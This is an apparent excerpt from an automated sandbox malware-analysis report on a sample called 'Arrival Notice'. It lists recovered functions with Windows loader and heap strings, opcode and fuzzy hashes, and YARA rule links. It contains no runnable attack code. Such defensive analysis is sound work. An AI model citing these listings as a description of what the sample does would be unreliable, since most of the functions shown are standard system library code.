                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-1334570610
                                                                              • Opcode ID: c7566c6a42b41c27eee859865b1374d0f30a2e1a8c2a4760201765447f56216f
                                                                              • Instruction ID: f843f9240676804ce36d754727bacfff652256ccc198c5b92a95dd2e171da25c
                                                                              • Opcode Fuzzy Hash: c7566c6a42b41c27eee859865b1374d0f30a2e1a8c2a4760201765447f56216f
                                                                              • Instruction Fuzzy Hash: DD61BC70610302DFDB29DF28C880B6ABBF1FF44704F14856AE8599F292D7B0E885CB91
                                                                              Function 015AC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 015E82DE
                                                                              • Failed to reallocate the system dirs string !, xrefs: 015E82D7
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015E82E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1783798831
                                                                              • Opcode ID: 9aa0ae409d19a2510147b33cafe42cf3595362148127446f6043cd6f5843b92d
                                                                              • Instruction ID: 01280e0eab32db401bc614d3efcb6fcb785c4ebd127501b463d127d15ba2379c
                                                                              • Opcode Fuzzy Hash: 9aa0ae409d19a2510147b33cafe42cf3595362148127446f6043cd6f5843b92d
                                                                              • Instruction Fuzzy Hash: 7C41F2B1594312ABC721EB68ED44B5F7BE8BF84750F00482EF949DB261EB70D800CB92
                                                                              Function 0162C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • @, xrefs: 0162C1F1
                                                                              • PreferredUILanguages, xrefs: 0162C212
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0162C1C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                              • API String ID: 0-2968386058
                                                                              • Opcode ID: 37bfe3d2a49746eefa02470daba41c193cae5fcfe58f7ebf3b55c3dbd4be15f8
                                                                              • Instruction ID: 3c2c65f35b18430cea1b089217f60ae27657e4d314d829aaad5c2f25e326d581
                                                                              • Opcode Fuzzy Hash: 37bfe3d2a49746eefa02470daba41c193cae5fcfe58f7ebf3b55c3dbd4be15f8
                                                                              • Instruction Fuzzy Hash: D0418371E0161AEBDF11DBD8CC91FEEBBB8BB55700F14806AE605B7240DB749A458F50
                                                                              Function 01604144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                              • API String ID: 0-1373925480
                                                                              • Opcode ID: b6e825ebc068c77b04f2c2eb72e5e1e9ecaac2d1e2a35b4cf38a387bd8dca804
                                                                              • Instruction ID: 8c7224cb9ecb2873edf7f07fb66ced00c2b0b2a3ac30af8d9ea5cd3945aaf994
                                                                              • Opcode Fuzzy Hash: b6e825ebc068c77b04f2c2eb72e5e1e9ecaac2d1e2a35b4cf38a387bd8dca804
                                                                              • Instruction Fuzzy Hash: C441E431A0065A8BEB3ADB99CC40BAEBBB4FF95740F14045ADA01AF7D1DB359901CB51
                                                                              Function 015F4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 015F4888
                                                                              • LdrpCheckRedirection, xrefs: 015F488F
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015F4899
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-3154609507
                                                                              • Opcode ID: dfd33d1c25ddffcfc48814ee273020e71d6b0c1177fbe8eecd2205f3655c6c34
                                                                              • Instruction ID: 51d17df0920c9775a07a8fd9ffbfe61fffcd79543b0dc32cff2fb74ea496165f
                                                                              • Opcode Fuzzy Hash: dfd33d1c25ddffcfc48814ee273020e71d6b0c1177fbe8eecd2205f3655c6c34
                                                                              • Instruction Fuzzy Hash: D441AF32A056519FCB21CE69D840A2BBBE4BF89A50F05056DEF499F325D730E811CB91
                                                                              Function 01580BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-2558761708
                                                                              • Opcode ID: cac88802451154b06baa219727a2dceb940c613ea0fcef735eff45dce35e10b2
                                                                              • Instruction ID: 07bab9573881f75c89e89aca6a03a991a8ffaab3b928e42e581d958927ec0a4a
                                                                              • Opcode Fuzzy Hash: cac88802451154b06baa219727a2dceb940c613ea0fcef735eff45dce35e10b2
                                                                              • Instruction Fuzzy Hash: 1B11E4313251429FD729DA2CC841B7EB7A4FF8062AF188529F406DF291E734D849C792
                                                                              Function 015F20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • LdrpInitializationFailure, xrefs: 015F20FA
                                                                              • Process initialization failed with status 0x%08lx, xrefs: 015F20F3
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015F2104
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2986994758
                                                                              • Opcode ID: 9ce44b346481c5c4bb34e3159a829256e5b838b0bc7c0c5237a27df00ab4ef8b
                                                                              • Instruction ID: c3605e4410d0dfdde69b23d409b629a48a594bb5348e7f7a8586641f2f562f9d
                                                                              • Opcode Fuzzy Hash: 9ce44b346481c5c4bb34e3159a829256e5b838b0bc7c0c5237a27df00ab4ef8b
                                                                              • Instruction Fuzzy Hash: 05F0AFB5A40309ABE724E64DCC67FA93BA8FB80A54F10005DFB046F685D2B0A9108695
                                                                              Function 015803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: #%u
                                                                              • API String ID: 48624451-232158463
                                                                              • Opcode ID: 2edadbe30c13d85d6bd20b0fb7f7fef29ce7ce9382b6d79dcafc80e74ab82806
                                                                              • Instruction ID: 8780b590e13ef008f47e88f75473131402baca18c7319a37ceb347d475caa012
                                                                              • Opcode Fuzzy Hash: 2edadbe30c13d85d6bd20b0fb7f7fef29ce7ce9382b6d79dcafc80e74ab82806
                                                                              • Instruction Fuzzy Hash: 81715971A0110A9FDB11EFA8C990BAEB7F8BF48744F144065E905FB291EB34ED01CB60
                                                                              Function 0157A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • LdrResSearchResource Enter, xrefs: 0157AA13
                                                                              • LdrResSearchResource Exit, xrefs: 0157AA25
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                              • API String ID: 0-4066393604
                                                                              • Opcode ID: ed73a30f474d49bc7192762ce08a46b7aadd43253abff23712b4e254cec9c8e2
                                                                              • Instruction ID: 6b7fcf48e5aa6a9412c9eab42c345f945bbf38272ff21152f3969ecdedaa7049
                                                                              • Opcode Fuzzy Hash: ed73a30f474d49bc7192762ce08a46b7aadd43253abff23712b4e254cec9c8e2
                                                                              • Instruction Fuzzy Hash: 54E19171E0420AAFEB22DF9CD981BAEBBB9BF44310F180866E911EF241D774D940CB51
                                                                              Function 0163A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                              • Instruction ID: b06717838e6d1b48678fd6c058b8338b0da61a8b3da6f74505cea91616b54b41
                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                              • Instruction Fuzzy Hash: 96C1AB312043429BEB25CF68CC41B6ABBE6AFD4318F084A2CF6D6CB291D775D505EB91
                                                                              Function 015EE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Legacy$UEFI
                                                                              • API String ID: 2994545307-634100481
                                                                              • Opcode ID: d784d032b9d54bc42a099a992c75eb3d33bd1fee0a1bc0b0a47975a7097d1f60
                                                                              • Instruction ID: d612a4b68f5463ead7004644122f53e6d0272d1154bda18ee5e0788359c6d88a
                                                                              • Opcode Fuzzy Hash: d784d032b9d54bc42a099a992c75eb3d33bd1fee0a1bc0b0a47975a7097d1f60
                                                                              • Instruction Fuzzy Hash: D2615BB1E146099FDB29DFA8C885BADBBF9FB48700F14446DE649EF251D731A900CB50
                                                                              Function 016143D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$MUI
                                                                              • API String ID: 0-17815947
                                                                              • Opcode ID: 07aee3292ee4e52c9b113a6ee3facc4956d1258d9d2e5939916d9d2ba2523184
                                                                              • Instruction ID: cb590f60a865ab8f9e40e9a084664f63639d136557d81e823015354038490269
                                                                              • Opcode Fuzzy Hash: 07aee3292ee4e52c9b113a6ee3facc4956d1258d9d2e5939916d9d2ba2523184
                                                                              • Instruction Fuzzy Hash: 01510871E0025EAFDF11DFA9CC80AEEBBB8FB44754F140529E611BB294DB319905CB60
                                                                              Function 015704E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0157063D
                                                                              • kLsE, xrefs: 01570540
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                              • API String ID: 0-2547482624
                                                                              • Opcode ID: 1ffe9402f1fec18d327f7d6ccf6ec9fb88abe1de55d83b80e38360e1d2eb4231
                                                                              • Instruction ID: dc770ca6ccdfb8b591edb39d780bdb7bedd7ccd0855eb9ef7514daf75c61912f
                                                                              • Opcode Fuzzy Hash: 1ffe9402f1fec18d327f7d6ccf6ec9fb88abe1de55d83b80e38360e1d2eb4231
                                                                              • Instruction Fuzzy Hash: FE51B0B15147428FD724DF68E5416ABBBE4BF86304F10483EF69A8B281E770E545CF92
                                                                              Function 0157A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0157A2FB
                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0157A309
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                              • API String ID: 0-2876891731
                                                                              • Opcode ID: 2893e504742e959c81cdbf5a8e4fefb25e954f31c6ccf03b95275d58335f604d
                                                                              • Instruction ID: 1100c59d51fee86ab1bc8d8124a243da7e60fed234240870601d1f6defbd26e4
                                                                              • Opcode Fuzzy Hash: 2893e504742e959c81cdbf5a8e4fefb25e954f31c6ccf03b95275d58335f604d
                                                                              • Instruction Fuzzy Hash: 31417831A0464ADBEB21DF6DD841B6EBBB4FF84704F2844A9E910DF295E2B5D940CB50
                                                                              Function 015AA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: Cleanup Group$Threadpool!
                                                                              • API String ID: 2994545307-4008356553
                                                                              • Opcode ID: 91ef40e13384978959666cea64d9d8a2fb76011d246b5682bc89dc715d1f361c
                                                                              • Instruction ID: 5defcbc3dca2c9c35b7a02780307dd03f7385f91c592445b4703f79059ac7421
                                                                              • Opcode Fuzzy Hash: 91ef40e13384978959666cea64d9d8a2fb76011d246b5682bc89dc715d1f361c
                                                                              • Instruction Fuzzy Hash: 8201DCB2694700AFD321DF24DE45B2AB7E8F794B29F008939B648CB190E374E804CB46
                                                                              Function 0157C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: MUI
                                                                              • API String ID: 0-1339004836
                                                                              • Opcode ID: d20f30afbae35cf9758f43d95493cf15973eba8c513d09697d1ccfbde14a692c
                                                                              • Instruction ID: 50516f2d942eb51cf1112602d6fd42ceff7b352e44fcc9a2ec8256e16d9d8b79
                                                                              • Opcode Fuzzy Hash: d20f30afbae35cf9758f43d95493cf15973eba8c513d09697d1ccfbde14a692c
                                                                              • Instruction Fuzzy Hash: 8B826C75E0021A8FEB25CFA9E881BEDBBB5BF48310F148169E919AF351D7709981CF50
                                                                              Function 015F6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              • Opcode ID: 473b6621cfc186001f6b3a4efbee27148b324fa3e7e47557e1a41e5d26a99235
                                                                              • Instruction ID: 31387e436fcf8a7fdc90af9f3db4e3a886e34731a80dbf015b3e7776ea78a4b6
                                                                              • Opcode Fuzzy Hash: 473b6621cfc186001f6b3a4efbee27148b324fa3e7e47557e1a41e5d26a99235
                                                                              • Instruction Fuzzy Hash: D0916071A0021AAFEB21DB95CC85FAE7BB9FF55B50F100069F700BF191D675A900CBA1
                                                                              Function 0161E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              • Opcode ID: 060b2d998f7e718d8275dcedb46c7a6dc0b709a6eaa9d588fe53a7867e87f82e
                                                                              • Instruction ID: b17c4b9f74b99a04d94e90ed8a88749ec3a118b648434c38bd5258e4726e41fa
                                                                              • Opcode Fuzzy Hash: 060b2d998f7e718d8275dcedb46c7a6dc0b709a6eaa9d588fe53a7867e87f82e
                                                                              • Instruction Fuzzy Hash: FF919171A0050AAEDB27ABA5DC54FEFBBB9FF85740F140019F901AB254D776D902CB90
                                                                              Function 015AA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: GlobalTags
                                                                              • API String ID: 0-1106856819
                                                                              • Opcode ID: c7474268cfe001c93c49429e152390d2399bb207b9feb85c2a2cf620ccd26e06
                                                                              • Instruction ID: e10bac8e7e2694431788ccfa6d10471b1d75ddf3c2dacbc5b2c6a2b6c77ae0ed
                                                                              • Opcode Fuzzy Hash: c7474268cfe001c93c49429e152390d2399bb207b9feb85c2a2cf620ccd26e06
                                                                              • Instruction Fuzzy Hash: 3A717EB5E4420A8FDF28CF9DD5946ADBBF2BFA8780F14812EE505AB241E7309941CB50
                                                                              Function 01614978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .mui
                                                                              • API String ID: 0-1199573805
                                                                              • Opcode ID: 495613d1c416c9bab8ee7295a3c0d956c8ca8f99aa829cdf029a418466bfb949
                                                                              • Instruction ID: 28789b43ad19ba86ac0074f66e2dbd620c9db5a0857bf1b8956795c3ffd008c6
                                                                              • Opcode Fuzzy Hash: 495613d1c416c9bab8ee7295a3c0d956c8ca8f99aa829cdf029a418466bfb949
                                                                              • Instruction Fuzzy Hash: 3A517372D0022A9BDF10DF99DC40AAEBBB4BF54B14F09416AED11BB358DB349901CBA4
                                                                              Function 0158E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EXT-
                                                                              • API String ID: 0-1948896318
                                                                              • Opcode ID: 75d16df6b93a2e923f35854ab7278b11291650ad92e8e6730b50bd012db588f2
                                                                              • Instruction ID: d1cc9b801fd6dc7fa3114b64861bbfabe57cab6728aa6789c4cbc5363c225d9c
                                                                              • Opcode Fuzzy Hash: 75d16df6b93a2e923f35854ab7278b11291650ad92e8e6730b50bd012db588f2
                                                                              • Instruction Fuzzy Hash: 434160725083529BD711FA65C842B6FB7E8FF88614F04092DB594EF180E674D9048796
                                                                              Function 015EC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryHash
                                                                              • API String ID: 0-2202222882
                                                                              • Opcode ID: 9fc6bef73b92618fe9620d0c4c317de23007cb2563f31d99e930e9cf27c7d72a
                                                                              • Instruction ID: 9a38c18fee2c95b753926ec335f0b5d846e04aa23c20ab3c13f3fa6e6aebbc59
                                                                              • Opcode Fuzzy Hash: 9fc6bef73b92618fe9620d0c4c317de23007cb2563f31d99e930e9cf27c7d72a
                                                                              • Instruction Fuzzy Hash: 774122B1D0052EAADB25DA54CD84FDEB7BCBB45714F0045A5EB08AF140DB70AE898FA4
                                                                              Function 015F07C3 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ;bY
                                                                              • API String ID: 0-3928238319
                                                                              • Opcode ID: 9344572b1cce16c02aec29a681671fb1a1005cd6975de9599deb64b7da88db20
                                                                              • Instruction ID: 6cde05b51a8db547397f5a500fa48db3e93bd06354de10dee00198a31cdab036
                                                                              • Opcode Fuzzy Hash: 9344572b1cce16c02aec29a681671fb1a1005cd6975de9599deb64b7da88db20
                                                                              • Instruction Fuzzy Hash: 324180725043419FD760DF29C845B9BBBE8FF88654F004A2EFA98DB291D7709904CB92
                                                                              Function 01606B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #
                                                                              • API String ID: 0-1885708031
                                                                              • Opcode ID: 08b9a559efa1a33bfa2f6f0dae12c98ef3ff528f29c9bdfe10f7fa530f1d80a6
                                                                              • Instruction ID: e58a101259409456dc842f64de6faebf0edac39f99b0e427fc02c19d08e8a680
                                                                              • Opcode Fuzzy Hash: 08b9a559efa1a33bfa2f6f0dae12c98ef3ff528f29c9bdfe10f7fa530f1d80a6
                                                                              • Instruction Fuzzy Hash: 0B310331A0061A9AEB27DB69CC50BEF7BB8EF44704F144068E941AF2C2DB75E865CB50
                                                                              Function 015ECA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryName
                                                                              • API String ID: 0-215506332
                                                                              • Opcode ID: d384197c62eef44d8275cccd2b301259b3831b28e402e4896666d98150ebf79b
                                                                              • Instruction ID: b6aff690b19a0a677cf69c01bb61652c40c1cf8dfb1a9ac94bcf06a82f8a60b7
                                                                              • Opcode Fuzzy Hash: d384197c62eef44d8275cccd2b301259b3831b28e402e4896666d98150ebf79b
                                                                              • Instruction Fuzzy Hash: AB31E036D00516AFEF19DA58C859EAFBBB8FB80720F014569A911AF250D630EE00DBE0
                                                                              Function 015F892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 015F895E
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                              • API String ID: 0-702105204
                                                                              • Opcode ID: 1808a57191f8490c32e681e2c43f1c495ab3c9616cd0f3071ca8bc39ec697354
                                                                              • Instruction ID: fef93b21fe59f663148f9076c3f7ea4d4e7f7eec694f99ba0a576e5f05785754
                                                                              • Opcode Fuzzy Hash: 1808a57191f8490c32e681e2c43f1c495ab3c9616cd0f3071ca8bc39ec697354
                                                                              • Instruction Fuzzy Hash: 5101F2322102029FE7206A59DE85F5A7BA9FFD1294B04142CF7420E561CB20A880C792
                                                                              Function 01612000 Relevance: .8, Instructions: 757COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a303184f439d402fd750dd1366f696d67df2bc28db770b5656d1dc133238b8d1
                                                                              • Instruction ID: 9ee66a80456836bb624f12ffd414f2b4ebe095d4b0c567b57eabea7cb614c40e
                                                                              • Opcode Fuzzy Hash: a303184f439d402fd750dd1366f696d67df2bc28db770b5656d1dc133238b8d1
                                                                              • Instruction Fuzzy Hash: C342B0716083429BDB25CF68CCA0A6BBBE5BF88700F2D492DFA8297354D770D845CB52
                                                                              Function 01608158 Relevance: .6, Instructions: 617COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 227b91e8a1cf1c454216680ffc0e076ad036a147c8fdee483a19873316890510
                                                                              • Instruction ID: 29bc3563893f8d0bd46b2a0b9a5a28af480d72af243655e36afb48bd9f1bded1
                                                                              • Opcode Fuzzy Hash: 227b91e8a1cf1c454216680ffc0e076ad036a147c8fdee483a19873316890510
